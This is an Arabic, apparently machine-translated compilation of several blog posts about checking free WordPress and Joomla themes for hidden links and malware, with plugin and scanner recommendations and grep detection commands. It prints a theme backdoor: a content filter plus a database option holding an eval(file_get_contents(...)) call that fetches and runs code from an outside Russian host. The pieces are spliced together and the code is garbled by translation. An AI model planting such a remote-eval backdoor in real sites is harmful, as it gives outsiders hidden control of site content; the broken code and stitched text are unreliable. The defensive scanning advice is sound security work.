كيف تحمي نفسك من الروابط والفيروسات المخفية في قوالب Joomla و WordPress؟ البرنامج المساعد TAC أو كيفية التحقق من قالب للروابط الخارجية. كيفية التحقق من وجود فيروسات في قالب Wordpress.

مرحبا اصدقاء. هل أنت متأكد من أن قالب WordPress المجاني الذي تستخدمه لمواقع الويب والمدونات الخاصة بك آمن حقًا ولا يحتوي على تهديدات خفية ورموز ضارة؟ هل أنت متأكد تمامًا من هذا؟ قطعاً؟)

تعتقد أنهم قاموا بتشغيل القالب ، وإزالة الروابط المخفية منه ، وقد تم ذلك. تقوم بفحص ملفات الموقع بشكل دوري باستخدام برنامج مكافحة فيروسات ، وتبحث في أدوات مشرفي مواقع Yandex في علامة التبويب "الأمان" ، ومع الارتياح ، ترى رسالة هناك: " لم يتم العثور على شفرة ضارة في الموقع«.

هذا ما اعتقدته أيضًا. لا أريد أن أزعجك ، لكن ...

كود خطير مخفي في قوالب ووردبريس المجانية

هذه هي الرسالة التي تلقيتها الأسبوع الماضي عبر البريد من مضيفتي. في الآونة الأخيرة ، قاموا بإجراء فحص منتظم لجميع ملفات الموقع بحثًا عن المحتوى الضار ، ومع ذلك وجدوا هذا المحتوى بداخلي!

بدأ كل شيء بحقيقة أنني ذات يوم ذهبت إلى موقعي ولم أتمكن من تشغيله - ظهر نقش مسيء حول الملفات التي لم يتم العثور عليها بامتداد php. بعد أن توترت قليلاً ، ذهبت لدراسة محتويات المجلد مع الموقع على الاستضافة واكتشفت على الفور مشكلة - تمت إعادة تسمية ملف قالب fuctions.php الخاص بي إلى function.php.malware ، والتي ، كما كانت ، ألمحت بشكل غامض - مضاد فيروسات أو شيء من هذا القبيل يعمل هنا) بعد إدخال البريد ، وجدت التقرير أعلاه من المضيف.

كان أول شيء فعلته بالطبع هو التحقق ملف معين، ودرس محتوياته ، وفحصه بمضادات الفيروسات المختلفة ، والعشرات من خدمات عبر الانترنتللتحقق من وجود فيروسات ، إلخ. - في النهاية ، لم أجد شيئًا ، ادعى الجميع بالإجماع أن الملف آمن تمامًا. بالطبع ، أعربت عن شكوكي للمضيف ، قائلاً إنك أفسدت شيئًا ما ، لكن في حالة ما ، طلبت منهم تقديم تقرير عن اكتشاف جزء خبيث من التعليمات البرمجية.

وهذا ما قالوه لي

ذهبت إلى google للحصول على معلومات حول هذا الرمز وفكرت بجدية في ذلك ...

كيفية العثور على جزء من التعليمات البرمجية الضارة في قالب

كما اتضح ، هذه خدعة غير تافهة حقًا تسمح للأطراف المهتمة بنقل البيانات إلى موقعك وتغيير محتوى الصفحات دون علمك! إذا كنت تستخدم نموذجًا مجانيًا ، إذن أوصي بشدة بالتحقق من function.php الخاص بك للحصول على الكود التالي:

add_filter ('the_content'، '_bloginfo'، 10001) ؛
وظيفة _bloginfo (محتوى $) (
وظيفة $ العالمية ؛
إذا (is_single () && ( [بريد إلكتروني محمي](get_option ('blogoption')))! == خطأ) (
العودة $ co؛
) آخر إرجاع محتوى $؛
}

حتى مع معرفتي الضحلة جدًا بـ php ، يمكن ملاحظة أنه يتم إنشاء عامل تصفية معين مرتبط بالمحتوى المتغير العالمي والمحتوى ، وهما مسؤولان عن عرض المحتوى فقط على صفحات منشورات المدونة (شرط is_single). بالفعل مشبوهة أليس كذلك؟ حسنًا ، لنرى الآن ما الذي سيعرضه هذا كود معينعلى موقعنا.

يبدو أيضًا خيار المدونة المثير للاهتمام المطلوب في قاعدة البيانات مريبًا للغاية. نذهب إلى قاعدة البيانات الخاصة بنا بيانات MySQLونجد هناك جدولًا يسمى wp_options ، إذا لم تقم بتغيير البادئات ، فسيبدو هكذا افتراضيًا. وفيه نجد مجالًا يثير اهتمامنا يسمى blogoption

يا له من جمال! نرى الخيار التالي


إرجاع Eval (file_get_contents ('http://wpru.ru/aksimet.php؟id='.$post-> ID.' & m = 47 & n ')) ؛

أولئك. نحن من موقع معين (علاوة على ذلك ، روسي ، ضع في اعتبارك) نعيد محتوى يمكن أن يحمل أي شيء! أي عدد من الروابط ، أو الرموز الضارة ، أو النصوص المعدلة ، إلخ. الموقع نفسه ، عند الوصول إليه ، يعطي خطأ وصول 403 ، وهذا ليس مفاجئًا. بالطبع ، قمت أيضًا بإزالة هذا الخيار من قاعدة البيانات.

وفقًا للمعلومات الواردة من الضحايا ، عادةً ما يتم إرجاع محتوى مقالتك بالضبط مع تعديل واحد فقط - بدلاً من أي نقطة ". تم إخفاء ارتباط مفتوح في النص! وبالمناسبة ، تتم كتابة هذا الخيار في قاعدة البيانات عند تثبيت القالب نفسه ، ثم تدمر الكود الذي يقوم بذلك بأمان ذاتيًا. وعشت مع مثل هذه القمامة لمدة عامين ، ولم تكشف لي أي خدمة مكافحة فيروسات أو خدمة واحدة هذا التهديدلكل ذلك الوقت. لأكون صادقًا ، لم ألاحظ ما إذا كانت هذه التقنية قد نجحت بالنسبة لي ، أو إذا كان المكون الإضافي للأمان قد حظر هذا الاحتمال (أو ربما أغلق أحد تحديثات WordPressa هذه الفجوة) ، لكنه لا يزال مزعجًا.

أخلاق الجبن الحر

كيف تحب تطور "مترجمينا" للقوالب (أو أولئك الذين ينشرونهم في كتالوجاتهم)؟ لا يمكنك قطع الروابط من التذييل) إنه لأمر مؤسف لا أتذكر المكان الذي نزّلت منه نموذجي ، لقد كان ذلك منذ وقت طويل ، وإلا كنت قد كتبت بضع روابط لطيفة. وإذا كانت لدي في ذلك الوقت نفس التجربة التي أمتلكها الآن ، فعندئذٍ بالتأكيد لن أستخدم نموذجًا مجانيًا ، أو في الحالات القصوى ، لن أقوم بالتنزيل من مصادر غير معروفة!

من الأسهل شراء بعض القوالب المتميزة الرسمية مقابل 15-20 دولارًا على نفس القالب والعيش بسلام ، مع العلم أنه لا توجد ثغرات وروابط مشفرة فيه ، وحتى إذا كانت هناك نقاط ضعف ، فسيقوم المطورون بالتأكيد بإصدار تحديث يتم فيه سيتم إغلاق هذه الثقوب. ( بالمناسبة ، نشر Artem مؤخرًا مقالًا يتحدث فيه فقط عن القوالب المتميزة بل ويوزع رموزًا ترويجية لتخفيضات قاسية لأولئك المهتمين)

يعد WordPress المحرك الأكثر شيوعًا لإنشاء مواقع ومدونات معلومات متنوعة. إن أمان موقع الويب الخاص بك هو أكثر من أمان بياناتك. هذا أكثر أهمية ، لأنه يمثل أيضًا أمان جميع المستخدمين الذين يقرؤون موردك ويثقون به. وهذا هو سبب أهمية عدم إصابة الموقع بأي فيروسات أو أي تعليمات برمجية ضارة أخرى.

سنغطي كيفية حماية WordPress من القرصنة في إحدى المقالات التالية ، ولكن الآن أريد أن أخبرك بكيفية التحقق من موقع WordPress الخاص بك بحثًا عن الفيروسات والشفرات الضارة للتأكد من أن كل شيء آمن.

الخيار الأول الذي يتبادر إلى الذهن هو أن المتسللين قاموا باختراقك وإنشاء أبواب خلفية في كود موقعك حتى تتمكن من إرسال رسائل غير مرغوب فيها ووضع روابط وأشياء أخرى سيئة. يحدث هذا أحيانًا ، ولكنه نادر جدًا إذا قمت بتحديث البرنامج في الوقت المحدد.

هناك الآلاف من قوالب WordPress والإضافات المجانية ، وهنا يكمن الخطر. إنه شيء عندما تقوم بتنزيل قالب من موقع WordPress وآخر تمامًا عندما تجده في الموقع الأيسر. يمكن للمطورين عديمي الضمير تضمين العديد من التعليمات البرمجية الضارة في منتجاتهم. هناك المزيد من المخاطر إذا قمت بتنزيل قوالب متميزة مجانًا ، حيث لا يخاطر المتسللون بشيء ويمكنهم إضافة نوع من الثغرة الأمنية التي يمكنهم من خلالها اختراق وتنفيذ ما يحتاجون إليه. هذا هو السبب في أنه من المهم للغاية التحقق من موقع WordPress الخاص بك بحثًا عن الفيروسات.

فحص موقع Wordpress بحثًا عن الفيروسات

أول شيء يجب النظر إليه عند التحقق من موقع ليس فيروسات ، إنه مكونات WordPress الإضافية. بسرعة وسهولة ، يمكنك الزحف إلى موقعك والعثور على أقسام مشبوهة من التعليمات البرمجية التي تستحق البحث عنها ، سواء كانت في القالب أو المكون الإضافي أو جوهر Wodpress نفسه. دعنا نلقي نظرة على بعض المكونات الإضافية الأكثر شيوعًا:

1.TOC

يتحقق هذا المكون الإضافي البسيط جدًا من جميع السمات المثبتة على موقعك بحثًا عن تعليمات برمجية ضارة. يكتشف المكون الإضافي الروابط المخفية المشفرة بإدراج رمز base64 ، ويعرض أيضًا معلومات مفصلةحول المشاكل التي تم العثور عليها. في أغلب الأحيان ، الأجزاء التي تم العثور عليها من الكود ليست فيروسات ، ولكن من المحتمل أن تكون خطرة ، لذا يجب الانتباه إليها.

يفتح "مظهر" -> "تاك"ثم انتظر حتى يتم فحص جميع الموضوعات.

2.VIP الماسح الضوئي

تشبه إلى حد بعيد ماسح موضوع جدول المحتويات ، ولكن مع معلومات أكثر تفصيلاً. نفس الفرص لاكتشاف الروابط والشفرات المخفية والإدخالات الضارة الأخرى. ما عليك سوى فتح عنصر VIP Scanner في قسم الأدوات وتحليل النتيجة.

قد يكون كافيًا حذف الملفات غير الضرورية ، على سبيل المثال ، desktop.ini. أو تحتاج إلى إلقاء نظرة فاحصة على ما يحدث في الملفات التي تستخدم base64.

3. مكافحة البرامج الضارة من GOTMLS.NET

يسمح لك هذا المكون الإضافي ليس فقط بفحص السمات والجوهر للموقع بحثًا عن الفيروسات ، ولكن أيضًا لحماية الموقع من القوة الغاشمة لكلمة المرور وهجمات XSS و SQLInj المختلفة. يتم إجراء البحث بناءً على التواقيع ونقاط الضعف المعروفة. يمكن إصلاح بعض نقاط الضعف في مكانها. لبدء فحص الملفات ، افتح "مكافحة Malvare"في الشريط الجانبي ثم انقر فوق "تشغيل الفحص":

قبل أن تتمكن من إجراء فحص ، تحتاج إلى تحديث قواعد بيانات التوقيع.

4.Wordfence

هذا هو واحد من أكثر المكونات الإضافية للأمان وفحص البرامج الضارة شيوعًا في WordPress. بالإضافة إلى الماسح الضوئي ، الذي يمكنه العثور على معظم الإشارات المرجعية في كود WordPress ، هناك حماية في الوقت الفعلي ضد أنواع مختلفةالهجمات وهجمات القوة الغاشمة. أثناء البحث ، يجد البرنامج المساعد المشاكل المحتملةمع العديد من الإضافات والسمات ، يخبرك بتحديث WordPress.

افتح علامة تبويب "WP Defense"في الشريط الجانبي ، ثم انتقل إلى علامة التبويب "مسح"و اضغط "ابدأ المسح":

قد يستغرق المسح وقت محدد، ولكن عند الانتهاء ، سترى تقريرًا مفصلاً عن المشكلات التي تم العثور عليها.

5- مكافحة الفيروسات

هذا مكون إضافي بسيط آخر يقوم بفحص قالب موقع الويب الخاص بك بحثًا عن تعليمات برمجية ضارة. العيب هو أنه يتم فحص النموذج الحالي فقط ، ولكن يتم عرض المعلومات بتفاصيل كافية. سترى جميع الميزات الخطيرة الموجودة في السمة وبعد ذلك يمكنك تحليلها بالتفصيل ما إذا كانت تشكل أي خطر. ابحث عن عنصر "مضاد للفيروسات"في الإعدادات ثم انقر فوق "فحص قوالب السمة الآن":

6. مدقق النزاهة

من المستحسن أيضًا التحقق من النزاهة ملفات WordPress، في حالة تسجيل الفيروس بالفعل في مكان ما. للقيام بذلك ، يمكنك استخدام المكون الإضافي Integrity Checker. يقوم بفحص جميع الملفات الأساسية والمكونات الإضافية والقوالب من أجل التغييرات. في نهاية الفحص ، سترى معلومات حول الملفات المعدلة.

خدمات عبر الانترنت

هناك أيضًا العديد من الخدمات عبر الإنترنت التي تتيح لك التحقق من موقع WordPress الخاص بك بحثًا عن الفيروسات أو مجرد التحقق من القالب. فيما يلي بعض منهم:

themecheck.org- يمكنك تنزيل أرشيف السمات ويمكنك رؤية جميع التحذيرات المتعلقة بالوظائف الضارة المحتملة المستخدمة فيه. لا يمكنك فقط عرض معلومات حول الموضوع الخاص بك ، ولكن أيضًا حول الموضوعات الأخرى التي تم تحميلها بواسطة مستخدمين آخرين ، وكذلك حول إصدارات مختلفةالمواضيع. يمكن العثور على أي شيء تجده المكونات الإضافية بواسطة هذا الموقع. فحص مواضيع ووردبريسهو أيضا مهم جدا.

virustotal.com- مورد معروف حيث يمكنك فحص موقعك أو ملف القالب بحثًا عن الفيروسات.

ReScan.pro- فحص موقع WordPress بحثًا عن فيروسات باستخدام هذه الخدمة مجاني ، ويتم إجراء تحليل ثابت وديناميكي لاكتشاف عمليات إعادة التوجيه المحتملة. يقوم الماسح بفتح صفحات الموقع. يتحقق الموقع من القوائم السوداء المختلفة.

sitecheck.sucuri.net- خدمة بسيطة لفحص الموقع والسمات بحثًا عن الفيروسات. يوجد مكون إضافي لبرنامج WordPress. يكتشف الروابط والنصوص الخطيرة.

فحص يدوي

لا شيء يمكن أن يكون أفضل من التحقق اليدوي. يحتوي Linux على أداة grep رائعة تتيح لك البحث عن تكرارات سلاسل عشوائية في مجلد يحتوي على ملفات. يبقى أن نفهم ما سنبحث عنه:

EVAL - تتيح لك هذه الوظيفة تنفيذ أمر تعسفي كود php، لا يتم استخدامه من قبل المنتجات التي تحترم نفسها ، إذا كان أحد المكونات الإضافية أو السمة يستخدم هذه الوظيفة ، فمن المؤكد بنسبة 100٪ أن هناك فيروسًا هناك ؛

  • base64_decode- يمكن استخدام وظائف التشفير مع EVAL لإخفاء التعليمات البرمجية الضارة ، ولكن يمكن استخدامها أيضًا للأغراض السلمية ، لذا كن حذرًا ؛
  • sha1- طريقة أخرى لتشفير التعليمات البرمجية الخبيثة ؛
  • gzinflate- وظيفة الضغط ، نفس الأهداف ، جنبًا إلى جنب مع EVAL ، على سبيل المثال gzinflate (base64_decode (رمز) ؛
  • ستريف- يقلب السلسلة إلى الوراء ليس من قبل ، حيث يمكن استخدام البديل للتشفير البدائي ؛
  • مطبعة- طباعة المعلومات إلى المتصفح ، مع gzinflate أو base64_decode أمر خطير ؛
  • file_put_contents- لا يزال بإمكان WordPress نفسه أو المكونات الإضافية إنشاء ملفات في نظام الملفات ، ولكن إذا كان الموضوع يفعل ذلك ، فيجب أن تكون حذرًا وتحقق من سبب حاجته إليه ، حيث يمكن تثبيت الفيروسات ؛
  • file_get_contents- يتم استخدامه في معظم الحالات للأغراض السلمية ، ولكن يمكن استخدامه لتنزيل تعليمات برمجية ضارة أو قراءة المعلومات من الملفات ؛
  • لفة- نفس القصة؛
  • fopen- يفتح ملفًا للكتابة ، فأنت لا تعرف أبدًا ماذا ؛
  • نظام- تنفذ الوظيفة أمرًا في نظام Linux ، إذا تم ذلك بواسطة قالب أو ملحق أو ووردبريس نفسه ، فمن المرجح أن يكون هناك فيروس ؛
  • رابط رمزي- ينشئ روابط رمزية في النظام ، ربما يحاول الفيروس جعلها رئيسية نظام الملفاتمتاح من الخارج
  • ينسخ- نسخ ملف من مكان إلى آخر ؛
  • getcwd- يسترجع اسم دليل العمل الحالي ؛
  • cwd- يتغير دليل العمل الحالي؛
  • ini_get- يتلقى معلومات حول إعدادات PHP ، غالبًا للأغراض السلمية ، لكنك لا تعرف أبدًا ؛
  • تقرير الخطأ (0)- تعطيل إخراج أي رسائل خطأ ؛
  • window.top.location.href- وظيفة جافا سكريبت المستخدمة لإعادة التوجيه إلى صفحات أخرى ؛
  • اخترق- لذلك ، في حالة تحققنا فجأة ، قرر المخترق نفسه إخبارنا.

يمكنك استبدال كل كلمة على حدة في أمر مثل هذا:

grep -R "hacked" / var / www / path / to / files / wordpress / wp-content /

أو استخدم نصًا بسيطًا يبحث عن كل الكلمات مرة واحدة:

القيم = "base64_decode (
EVAL (base64_decode
gzinflate (base64_decode (
getcwd () ،
ستريف (
chr (أودر (
cwd
ini_get
window.top.location.href
ينسخ(
EVAL (
نظام(
رابط رمزي (
تقرير الخطأ (0)
مطبعة
file_get_contents (
file_put_contents (
fopen (
اخترق"

cd / var / www / path / to / files / wordpress / wp-content /
$ fgrep -nr - تضمين \ *. php "قيم $" *

مرحبًا أصدقاء Idea Fox!

لا أعرف عنك ، لكني لا أنام جيدًا في الليل. مشاكل أمان المدونة تعذبني. لا مزيد من القوة :-)

لقد قرأت مجموعة من المدونات حول هذا الموضوع واختبرت العديد من المكونات الإضافية التي تساعد في حل هذه المشكلة. نعم وفي التعليقات بدأوا في طرح الأسئلة حول موضوع حماية الموقع مما دفعني لكتابة هذه الملاحظة.

فقط تخيل أنك تقوم بالتدوين وتكتب المقالات وتحاول ... ويأتي المتسكعون الأشرار ويكسرون موقعك. أعتقد أنه سيكون هناك الكثير من خيبات الأمل.

بعد كل شيء ، كل مدون عادي يستثمر الكثير من الوقت والجهد في تطوير موقعه. بالنسبة للكثيرين ، يصبح التدوين عمومًا هوسًا ... هنا وما فوق ، إذا حدث مثل هذا :-)

حسنًا ، أنت تفهم مدى أهمية هذا.

دعنا أخيرًا نبدأ العمل :)

قبل شهرين ، كتبت بالفعل ملاحظة حول شيء ما من القرصنة. تأكد من قراءتها. ولكن مر وقت طويل منذ ذلك الحين ، واتخذت إجراءات إضافية لتعزيز الدفاع الشامل.

في الملاحظات التالية ، سوف أتطرق بالتأكيد إلى هذه المسألة بالتفصيل. (أتذكر أيضًا وأكتب عن إعداد مزود خدمة الإنترنت)

3. نتحقق من الموقع على خدمات أخرى عبر الإنترنت

طلق مثل هذه الخدمات على ما يبدو - بشكل غير مرئي. لدي رأي قوي بأن العديد منهم أغبياء تمامًا وقد تم إنشاؤهم فقط لعرض الإعلانات.

دكتور ويب

صنع DR.Web خدمة جيدةللتحقق من المواقع على الإنترنت. شخصيًا ، ساعدني مرة واحدة في العثور على إصابة من صديق على المدونة (كان هناك رمز جهة خارجية في ملف htaccess.)

الشيك بسيط للغاية. أدخل عنوان URL الخاص بك وانتظر نتيجة الفحص.

antivirus-alarm.ru

زاحف مواقع ويب قوي يستخدم ما يصل إلى 43 قواعد بيانات مكافحة الفيروساتمن شركات مكافحة الفيروسات الرائدة في العالم.

هنا أيضًا ، كل شيء بسيط جدًا. نحن نقود إلى عنوان URL لموقعنا وبنفس شديد ننتظر نتائج الفحص.

هذا ما كنت أنتظره.

كل شيء نظيف ، يمكنك النوم بسلام :-)

كل هذا جيد بالتأكيد ، لكنك تحتاج أيضًا إلى تثبيت بعض المكونات الإضافية التي لا تتداخل على الإطلاق مع مدونات WordPress.

4. اطلب من المضيف التحقق من موقعك

الحقيقة هي أن المضيفين يهتمون بالمسائل الأمنية أكثر منك ولديهم أدوات حماية قوية. ووسائل الحماية المتخصصة.

ها هي أخباري لك اليوم. بعد ذلك ، سأتحدث عن البرنامج المساعد القوي، والذي يسمح لك بحماية مدونة WordPress الخاصة بك بشكل كبير من القرصنة.

أعمل معه منذ شهرين وأنا سعيد جدًا به. حتى الآن ، لقد تعاملت معه 3 مرات ومنعت نفسي: -) باختصار ، هناك شيء لأقوله.

واحد من معالمعند إنشاء مدونة - اختيار قالب عالي الجودة. هناك العديد من المواقع ، المدفوعة والمجانية. ومع ذلك ، يجب أن تكون حذرًا هنا ، حيث يوجد احتمال كبير بأن تحصل على فيروسات ونصوص ضارة وروابط مخفية مع الملف.

ولكن حتى إذا كان القالب نظيفًا من حيث الأمان ، وكان تصميمه وسهولة استخدامه ووظائفه يناسبك تمامًا ، فإن هذا لا يعني أن كل شيء على ما يرام. يجب أن يحتوي المظهر على كود HTML و CSS صالح ، بالإضافة إلى الامتثال لجميع المعايير CMS WordPress. حتى السمات المدفوعة والقوالب المخصصة لها مشاكل مع الأخير.

يقوم مطورو المحركات بتطويره باستمرار ، ولا يواكب مؤلفو القوالب ذلك دائمًا ، مستخدمين وظائف مهملة عند إنشائها.

سأوضح لك اليوم طريقتين للتحقق من سمات WordPress للامتثال للمعايير. يتم استخدام هذه الأدوات عند إضافتها إلى الدليل الرسمي https://wordpress.org/themes/

خدمة للتحقق من سمات WordPress وقوالب Joomla للامتثال للمعايير

ThemeCheck.org هو خدمة مجانية، والذي يسمح لك بالتحقق من أمان وجودة قوالب CMS WordPress و Joomla قبل التثبيت على الموقع.

للتحقق من موضوع ، قم بتحميل أرشيفه من جهاز الكمبيوتر الخاص بك عن طريق النقر فوق الزر "تحديد ملف" على موقع ويب themecheck.org. إذا كنت لا تريد حفظ نتائج الفحص في الخدمة وإتاحتها للمستخدمين الآخرين ، فتحقق من " ننسى البيانات التي تم تحميلها بعد النتائج". الآن اضغط على زر "إرسال".

على سبيل المثال ، تناولت الموضوع واجهه المستخدمتم تنزيله من الموقع الرسمي. 99 من 100-0 أخطاء فادحةو 1 تحذير. هذه نتيجة جيدة جدا

بالمقارنة ، تلقى قالب المدونة الخاص بي درجة 0 (14 خطأ و 23 تحذيرًا). أعتقد أنه بالنسبة للكثيرين ، لن تختلف النتائج كثيرًا ، خاصة إذا كانت الموضوعات قديمة بالفعل. توجد جميع التعليقات مع التفسيرات ، التي تشير إلى الملفات والأسطر التي تم العثور عليها فيها ، في نفس الصفحة أدناه.

بصراحة ، لم أفهم الكثير هناك ، سيكون أكثر فائدة للمؤلفين ، وسيكون تغيير النموذج أسهل بالنسبة لي من إصلاح كل شيء. أنا فقط لا أعرف متى سأذهب إليه.

يحتوي الصفحة الرئيسية على مجموعة كبيرة من سمات WordPress و Joomla على الويب التي تم اختبارها مسبقًا مع إمكانية الفرز حسب الوقت المضاف أو المصنف. عند النقر عليها ، يمكنك رؤية معلومات تفصيلية وروابط إلى موقع الويب الخاص بالمؤلف وصفحة التنزيل.

إذا كنت مطورًا وموضوعك صالح بنسبة 100٪ ، فيمكنك إخبار المستخدمين به عن طريق تعيين شارة تقييم خاصة عليه.

تكمن قيمة خدمة ThemeCheck.org في أنه يمكن لأي مشرف موقع استخدامها لتحديد سمة الجودة حتى قبل تثبيتها على المدونة.

الموضوع تحقق البرنامج المساعد

يمكنك التحقق من نموذج مثبت بالفعل للتوافق مع أحدث معايير WordPress باستخدام المكون الإضافي Theme Check. رابط التحميل احدث اصدار: https://wordpress.org/plugins/theme-check/

تشبه وظيفة المكون الإضافي الخدمة التي وصفتها أعلاه. ليست هناك حاجة لإجراء أي إعدادات بعد التثبيت والتفعيل القياسيين. طلب التحقق:

  1. انتقل إلى لوحة الإدارة في صفحة القائمة "المظهر" - "فحص السمة".
  2. حدد السمة المطلوبة من القائمة المنسدلة إذا كان هناك العديد منها مثبتًا.
  3. حدد مربع "منع المعلومات" إذا كنت لا تريد إرسال معلومات.
  4. انقر فوق الزر "التحقق من ذلك".

سيتم عرض النتائج على نفس الصفحة.

كما ترى ، الموضوع الافتراضي الفان وعشرةليس مثاليًا أيضًا ، ولكن ، على سبيل المثال ، الفين واربعتعشرلا يوجد لديه أخطاء.

بعد التحقق من المكون الإضافي ، يمكنك تعطيله ، ومن الأفضل حذفه تمامًا حتى المرة القادمة.

خاتمة.قبل تثبيت قالب WordPress جديد ، تحقق منه ليس فقط من أجل الروابط المخفيةوالتعليمات البرمجية الضارة مع البرنامج المساعد TAC ، ولكن أيضًا مع خدمة ThemeCheck.org أو المكون الإضافي Theme Check للامتثال لأحدث معايير CMS.

ملاحظة.أثناء تصفح TopSape Reader مؤخرًا ، رأيت مدونة zenpr.ru جديدة لتحسين محركات البحث ، والتي تحتل المرتبة الأولى بين المدونين من حيث النقرات شهريًا. بالنظر إلى أن عمره يزيد قليلاً عن شهر ، فإن النتيجة تستحق الاحترام. التصميم بأسلوب التبسيط ، إن لم يكن ليقول إنه غير موجود على الإطلاق ، لكن المؤلف يكتب - سوف تقرأه. كل الأعمال وبدون ماء. تمامًا كما هو الحال في عنوان المدونة - "صفر أحرف إضافية". أوصي بالقراءة ، ستجد الكثير من المعلومات المفيدة.

هناك الكثير من قوالب مواقع الويب المجانية على الإنترنت. الذي - التي جبن مجانييحدث ذلك فقط في مصيدة فئران ، والجميع يعلمون ولا تزال اليد تمد يدها لتنزيل مثل هذا مجانًا وتثبيته على موقع الويب الخاص بك.

قبل تثبيت قالب مجاني ، لن يضر التحقق من وجود روابط مخفية فيه.

من خلال وضع نموذج مجاني ، لا يفترض الكثيرون أنهم ببساطة لا يستطيعون الترويج وكسب المال على مثل هذا الموقع.

في أحد هذه النماذج ، يمكن أن يكون هناك عدة روابط في وقت واحد. من الجيد أيضًا أن تكون الروابط المتداخلة لموقع مشابه لموضوعك ، وليس مواقع للبالغين. وسيكون هناك اثنان أو ثلاثة فقط ، وليس العشرات.

كيف يؤدي تثبيت مثل هذا القالب المجاني إلى تهديد موقعك؟ سيقع الموقع تحت الفلتر ، ويكاد يكون الخروج منه مستحيلًا. الموقع تحت المرشحات هو موقع ميت!
تثبيت قالب مجاني على موقعك يشبه لعب الروليت الروسي. فقط فرصة لضبط على الاطلاق نمط نظيف، يساوي صفرًا.

في أحسن الأحوال ، سوف تحصل على 3-5 روابط متبقية على موقعك. يمكنك ، بالطبع ، محاولة تنظيف مثل هذا القالب ، ولكن هناك حرفيين يدخلون الروابط في القالب بطريقة لا يمكن إزالتها من هناك (القالب مكسور ، إنه يلتوي فقط).

لكي نكون صادقين ، من الأسهل طلب نموذج جديد نظيف وفريد ​​(لا يمكن أن يقال عن المجاني) ، سيكلف أقل.

على سبيل المثال ، أتقاضى 200 روبل لإنشاء قالب (اكتب إلى Skype: oxamitta). قل لي ، هل يستحق ذلك؟ خذ حرًا وتفقد الموقع ، لكن وفر 200 روبل؟ مدخرات مدهشة !!!

ولكن ماذا لو كنت قد راهنت بالفعل على قالب مجاني؟ كيفية التحقق من قالب للروابط المخفية؟

هناك ملحق خاص لهذا الغرض. لن يساعد إزالة هذه الروابط ، ولكن تحديدها - من فضلك.

ربما لا يكون كل شيء مخيفًا جدًا ولا يحتوي النموذج الخاص بك إلا على رابطين خارجيين! هل تريد اختبار النموذج؟ ثم قم بتنزيل المكون الإضافي من الرابط أدناه (لمشاهدة الرابط لتنزيل المكون الإضافي ، انقر فوق أحد أزرار الشبكات الاجتماعية).

يتم تثبيت المكون الإضافي في لوحة إدارة الموقع بالطريقة القياسية. ليس من المنطقي التصوير حول هذا الفيديو ، لذلك سنتعامل اليوم مع بضع لقطات شاشة.

قم بتثبيت البرنامج المساعد وتنشيطه.

لتكبير لقطة الشاشة ، انقر عليها بزر الفأرة الأيسر.

انتقل إلى علامة التبويب المظهر ، TAS.



تحميل...
قمة